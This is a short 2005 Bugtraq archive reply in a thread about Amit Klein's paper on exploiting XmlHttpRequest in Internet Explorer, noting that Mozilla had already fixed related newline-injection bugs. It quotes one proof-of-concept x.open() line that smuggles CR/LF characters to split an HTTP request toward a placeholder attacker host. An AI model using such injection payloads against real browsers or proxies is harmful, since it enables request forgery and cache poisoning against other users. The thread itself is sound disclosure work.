Bugtraq mailing list archives
Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein
From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Wed, 28 Sep 2005 18:06:49 +0200
On 27 Sep 2005 at 21:34, Yutaka OIWA wrote:
Hello Amit, "Amit Klein (AKsecurity)" <aksecurity () hotpop com> writes:x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP /1.0\r\nFoobar:","http://www.attacker.site/",false);This kind of bugs are already fixed in recent Mozilla browsers, as shown in your reference [4].[4] "setRequestHeader can be exploited using newline characters", Bugzilla bug 297078 https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and "XMLHttpRequest allows dangerous request headers to be set", Bugzilla bug 302263 https://bugzilla.mozilla.org/show_bug.cgi?id=302263see comment #15 of bug 297078. https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15
Oh. I missed this. So - very good. And thanks for bringing this to Bugtraq's and mine attention. And while we're here - kudos for your work! -Amit
Current thread:
- "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Amit Klein (AKsecurity) (Sep 24)
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Yutaka OIWA (Sep 27)
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Amit Klein (AKsecurity) (Sep 28)
- <Possible follow-ups>
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein anonymous (Sep 27)
- RE: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Sergey V. Gordeychik (Sep 30)
- Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein Yutaka OIWA (Sep 27)